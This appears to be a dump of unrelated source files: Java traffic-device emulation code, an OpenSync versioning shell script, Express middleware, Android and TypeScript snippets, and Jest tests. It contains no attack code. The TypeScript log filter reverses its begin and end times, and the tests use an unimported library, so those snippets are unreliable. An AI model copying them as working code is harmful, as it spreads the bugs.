// } catch (NoMatchingDataException ex) {
// TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
// responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "no valid data available", ex.getMessage());
// } catch (EntityEmulationException ex) {
// TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
// responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "other", ex.getMessage());
// }
//
// try {
// TMDDNRTMSelections.getInstance().verifyMessageNRTM(dialog, responseMsg, TMDDEntityType.EntityType.GENERIC);
// } catch (NRTMViolationException ex) {
// TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
// responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "missing information prevents processing message", ex.getMessage());
// } catch (EntityEmulationException ex) {
// TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
// responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "other", ex.getMessage());
// }
return responseMsg;
}
@Override
public EntityControlRequestStatusRecord getControlRequestStatus(String orgId, String entityId, String requestId) throws EntityEmulationException {
return EntityControlRequestStatus.getControlRequestStatus(orgId, entityId, requestId);
}
@Override
public void updateControlRequestStatus(EntityControlRequestStatusRecord statusRecord, MessageSpecification requestMsg) throws EntityEmulationException {
EntityControlRequestStatus.updateControlRequestStatus(statusRecord, requestMsg, true);
}
@Override
public void verifyCommand(MessageSpecification commandMessage) throws InvalidCommandException, EntityEmulationException {
throw new UnsupportedOperationException("Not supported yet."); //To change body of generated methods, choose Tools | Templates.
}
@Override
public void executeCommand(MessageSpecification commandMessage) throws EntityEmulationException {
if (commandMessage.containsMessageOfType("tmdd:deviceControlStatusRequestMsg")) {
// get the org Id from the message
String orgId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.organization-requesting.organization-id");
// get the entity ID from the message
String entityId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.device-id");
// get the request ID from the message
String requestId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.request-id");
// get the matching control Request Status record
EntityControlRequestStatusRecord statusRecord = EntityCommandQueue.getInstance().getControlRequestStatus(orgId, entityId, requestId);
// If there is no queued control request matching the cancel request throw an exception.
if (!statusRecord.getStatus().equals("3") && !statusRecord.getStatus().equals("request queued/not implemented")) {
throw new NoMatchingDataException("No matching control requests are currently queued.");
}
statusRecord.setStatus("other");
statusRecord.setLockStatus(0);
statusRecord.updateDate();
EntityCommandQueue.getInstance().updateControlRequestStatus(statusRecord, commandMessage, true);
}
}
@Override
public void queueCommand(MessageSpecification commandMessage) throws InvalidEntityControlRequestStatusException, InvalidEntityControlRequestLogException, EntityEmulationException {
throw new UnsupportedOperationException("Not supported yet."); //To change body of generated methods, choose Tools | Templates.
}
@Override
public MessageSpecification getControlResponseMessage(MessageSpecification commandMessage) throws InvalidEntityControlRequestStatusException, EntityEmulationException {
// get the org Id from the message
String orgId = "";
// get the entity ID from the message
String entityId = "";
// get the request ID from the message
String requestId = "";
if (commandMessage.containsMessageOfType("tmdd:deviceControlStatusRequestMsg")) {
// get the org Id from the message
orgId = commandMessage.getElementValue("tmdd:deviceControlStatusRequestMsg.organization-requesting.organization-id");
// get the entity ID from the message
entityId = commandMessage.getElementValue("tmdd:deviceControlStatusRequestMsg.device-id");
// get the request ID from the message
requestId = commandMessage.getElementValue("tmdd:deviceControlStatusRequestMsg.request-id");
} else {
// get the org Id from the message
orgId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.organization-requesting.organization-id");
// get the entity ID from the message
entityId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.device-id");
// get the request ID from the message
requestId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.request-id");
}
// get the matching control Request Status record
EntityControlRequestStatusRecord statusRecord = EntityCommandQueue.getInstance().getControlRequestStatus(orgId, entityId, requestId);
TMDDEntityType.EntityType entityType = TMDDEntityType.EntityType.valueOf(statusRecord.getEntityType());
ArrayList<String> controlResponseList = new ArrayList();
System.out.println("SectionHandler::getControlResponseMessage Is tmdd:deviceCancelControlRequestMsg");
for (String thisElement : TMDDMessageProcessor.createControlResponseMessage(entityType, statusRecord, orgInfoDataCollector).getMessageSpec()) {
// Add all elements that come from DeviceControlResponse unless it is organization-information-forwarding-restrictions
if (!thisElement.contains("organization-information-forwarding-restrictions")) {
controlResponseList.add(thisElement);
}
}
return new MessageSpecification(controlResponseList);
}
}
|
sudo pip3 install -r requirements.txt |
public class Palindrome {
public static boolean isPalindrome(String s) {
for (int i = 0; i < s.length(); i++) {
if (s.charAt(i) != s.charAt(s.length() - 1 - i)) {
return false;
}
}
return true;
}
public static void main(String[] args) {
String s = "racecar";
System.out.println(isPalindrome(s));
}
} |
package ru.job4j.profession;
/**
* Шаблон профессий.
* @author <NAME> ( https://vk.com/id428714363)
* @version 1.0
* @since 13.06.19
*/
public class Profession {
/** Стаж работы. */
private double standing;
/** имя сотрудника. */
private String name;
/** Фамилия сотрудника. */
private String surname;
/** Образование сотрудника. */
private String education;
/** Оклад сотрудника. */
private double salary;
/** График работы сотрудника. */
private String timetable;
public double getStanding() {
return standing;
}
public String getName() {
return name;
}
public String getSurname() {
return surname;
}
public String getEducation() {
return education;
}
public double getSalary() {
return salary;
}
public String getTimetable() {
return timetable;
}
}
|
# Copyright (c) 2015, Plume Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Plume Design Inc. nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Plume Design Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
#
# version-lib.sh - provides version data for image creation
# (meant to be sourced)
#
#
# Interface of version.lib.sh
# ---------------------------
#
# input:
# CURDIR
# OPENSYNC_TARGET_VERSION_OVERRIDE
# VERSION_TARGET
# TARGET
# VENDOR_DIR
# VERSION_FILE
# BUILD_NUMBER
# IMAGE_DEPLOYMENT_PROFILE
# LAYER_LIST
# VER_DATE
# VERSION_APPEND
# VERSION_APPEND_END
#
# output:
# SHA1 (sha1 of git repository used to build)
# DIRTY_STRING (local modifications string)
# VERSION (target/product version)
# USERNAME (user used to build the image)
# HOSTNAME (hostname used to build the image)
# VER_DATE (date of image build)
# APP_VERSION (application version string)
# BUILD_NUMBER (consecutive build number)
# OSYNC_VERSION (OpenSync version - core/.version)
#
# Full version format:
# VERSION-BUILD_NUMBER-gSHA1-DIRTY_STRING-VERSION_APPEND-IMAGE_DEPLOYMENT_PROFILE-VERSION_APPEND_END
#
# Version number uses the first defined value from the below list:
# 1. env. var. $OPENSYNC_TARGET_VERSION_OVERRIDE
# 2. file $VENDOR_DIR/.version.$VERSION_TARGET
# 3. file $VENDOR_DIR/.version.$TARGET
# 4. file $VENDOR_DIR/.version
# 5. file core/.version
if [ -z "$CURDIR" ]; then
CURDIR=`dirname $0`
fi
cd ${CURDIR}/../../../
if [ -e .git -o -e ../.git ]; then
SHA1='g'`[ -e ../.git ] && cd ..; git log --pretty=oneline --abbrev-commit -1 | awk '{ print $1 }' | cut -b1-7`
DIRTY=`[ -e ../.git ] && cd ..; git status --porcelain | grep -v -e '^??' | wc -l`
else
echo "WARNING: version not in git" 1>&2
SHA1="notgit"
DIRTY=0
fi
# per vendor/product versioning:
if [ -z "$VERSION_FILE" ]; then
VERSION_FILE="$VENDOR_DIR/.version.$VERSION_TARGET"
if [ ! -f "$VERSION_FILE" ]; then
VERSION_FILE="$VENDOR_DIR/.version.$TARGET"
fi
if [ ! -f "$VERSION_FILE" ]; then
VERSION_FILE="$VENDOR_DIR/.version"
fi
if [ ! -f "$VERSION_FILE" ]; then
VERSION_FILE=".version"
fi
fi
if [ -n "$OPENSYNC_TARGET_VERSION_OVERRIDE" ]; then
VERSION="$OPENSYNC_TARGET_VERSION_OVERRIDE"
else
VERSION=`cat $VERSION_FILE`
fi
OSYNC_VERSION=`cat .version`
DIRTY_STRING=""
if [ ${DIRTY} -ne 0 ]; then
DIRTY_STRING="-mods"
fi
USERNAME=`id -n -u`
HOSTNAME=`hostname`
if [ -z "$VER_DATE" ]; then
VER_DATE=`date`
fi
# First see if BUILD_NUMBER is defined in environment by Jenkins,
# then try to find it in file, and if not found use 0
if [ -z "${BUILD_NUMBER}" ]; then
if [ -f "${CURDIR}/../../../.buildnum" ]; then
BUILD_NUMBER=`cat ${CURDIR}/../../../.buildnum`
fi
fi
if [ -z "${BUILD_NUMBER}" ]; then
BUILD_NUMBER="0"
fi
APP_VERSION="${VERSION}"
if [ "${VERSION_NO_BUILDNUM}" != "1" ]; then
# append build number
APP_VERSION="${APP_VERSION}-${BUILD_NUMBER}"
fi
if [ "${VERSION_NO_SHA1}" != "1" ]; then
# append SHA1
APP_VERSION="${APP_VERSION}-${SHA1}"
fi
if [ "${VERSION_NO_MODS}" != "1" ]; then
# append dirty string
APP_VERSION="${APP_VERSION}${DIRTY_STRING}"
fi
if [ -n "${VERSION_APPEND}" ]; then
# append custom string before profile
APP_VERSION="${APP_VERSION}-${VERSION_APPEND}"
fi
# append profile
if [ "${VERSION_NO_PROFILE}" != "1" ]; then
if [ -z "${IMAGE_DEPLOYMENT_PROFILE}" ]; then
IMAGE_DEPLOYMENT_PROFILE="development"
fi
if [ -n "${IMAGE_DEPLOYMENT_PROFILE}" -a "${IMAGE_DEPLOYMENT_PROFILE}" != "none" ]; then
APP_VERSION="${APP_VERSION}-${IMAGE_DEPLOYMENT_PROFILE}"
fi
fi
if [ -n "${VERSION_APPEND_END}" ]; then
# append custom string after profile
APP_VERSION="${APP_VERSION}-${VERSION_APPEND_END}"
fi
cd - >/dev/null
|
const Bookshelf = require('../models/bookshelfModel');
const UserShelfBook = require('../models/userShelfBookModel');
const UserBook = require('../models/userBooksModel');
const createUserShelfBookRequirements = async (req, res, next) => {
try {
const { shelfId, bookId } = req.body;
if (!shelfId)
return res
.status(400)
.json({ status: 'Failure', error: 'shelfId field is required' });
if (!bookId)
return res
.status(400)
.json({ status: 'Failure', error: 'bookId field is required' });
const bookshelf = await Bookshelf.findById(shelfId);
const userBook = await UserBook.findById(bookId);
const userShelfBook = await UserShelfBook.findBookInBookshelf(
shelfId,
bookId
);
if (!bookshelf)
return res.status(400).json({
status: 'Failure',
error: 'Bookshelf with that id does not exist',
});
if (!userBook)
return res.status(400).json({
status: 'Failure',
error: 'User does not have a book with that id',
});
if (userShelfBook)
return res
.status(400)
.json({ status: 'Failure', error: 'Book already in bookshelf' });
next();
} catch (error) {
console.log(error);
return res.status(500).json({ status: 'Failure', error: 'Server failure' });
}
};
module.exports = createUserShelfBookRequirements;
|
<reponame>jeanboydev/Android-PermissionMaster<filename>component_permission/src/main/java/com/jeanboy/component/permission/core/Ranger.java
package com.jeanboy.component.permission.core;
import android.content.Context;
/**
* @author caojianbo
* @since 2019/12/26 15:03
*/
public interface Ranger {
boolean isGranted(Context context);
void onAction(Context context);
}
|
import moment from 'moment';
export interface LogDateFilter {
beginAt: Function;
endAt: Function;
text: string;
}
export const defaultLogDateFilter: LogDateFilter = {
text: 'Last 15 minutes',
beginAt: () => moment().toDate(),
endAt: () => moment().subtract(15, "minutes").toDate()
};
|
<filename>webpack/src/common/utils/fp.test.js
import * as fp from './fp'
test('toggle list item', () => {
expect(fp.arrayToggle('a', ['a', 'b', 'c'])).toEqual(['b', 'c'])
expect(fp.arrayToggle('c', ['a', 'b'])).toEqual(['a', 'b', 'c'])
expect(fp.arrayToggle(1, [1])).toEqual([])
expect(fp.arrayToggle('a', [])).toEqual(['a'])
expect(fp.arrayToggle(1, [1])).toEqual([])
expect(fp.arrayToggle(1, [2])).toEqual([1, 2])
expect(fp.arrayToggle([1, 2], [1, 2, 4])).toEqual([4])
expect(fp.arrayToggle([1, 2], [3, 4])).toEqual([1, 2, 3, 4])
expect(fp.arrayToggle([1, 2, 3], [3, 4])).toEqual([1, 2, 4])
})
test('toggle object item', () => {
const toggle = fp.objectToggle('a', 1)
expect(toggle({ a: 1, b: 2 })).toEqual({ b: 2 })
expect(toggle({ a: 2, b: 1 })).toEqual({ a: 1, b: 1 })
expect(toggle({ b: 1 })).toEqual({ a: 1, b: 1 })
})
test('toggle combined item', () => {
const toggle = fp.combinedToggle('a', 1)
expect(toggle({ a: 1, b: 2 })).toEqual({ b: 2 })
expect(toggle({ a: 2, b: 1 })).toEqual({ a: 1, b: 1 })
expect(toggle({ b: 1 })).toEqual({ a: 1, b: 1 })
expect(toggle({ a: [1] })).toEqual({ a: [] })
expect(toggle({ a: [2] })).toEqual({ a: [1, 2] })
})
test('without and union', () => {
expect(fp.without(1, [1, 2, 3])).toEqual([2, 3])
expect(fp.union(1, [1, 2, 3])).toEqual([1, 2, 3])
expect(fp.union(1, [2, 3])).toEqual([1, 2, 3])
})
test('partial apply of curried functions', () => {
const spec = {
a: (a, b) => a + b,
b: R.curry((a, b) => a + b),
c: R.uncurryN(2, a => b => a + b),
}
expect(fp.partialMap(spec, 100).a(1)).toBe(101)
expect(fp.partialMap(spec, [1]).b(4)).toBe(5)
expect(fp.partialMap(spec, [100, 200]).c).toBe(300)
})
|
#!/usr/bin/env bash
tsc --project demo/webapp
./node_modules/.bin/webpack demo/webapp/lib/demo/webapp/webapp.js demo/server/public/lib/reactdemo.js |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.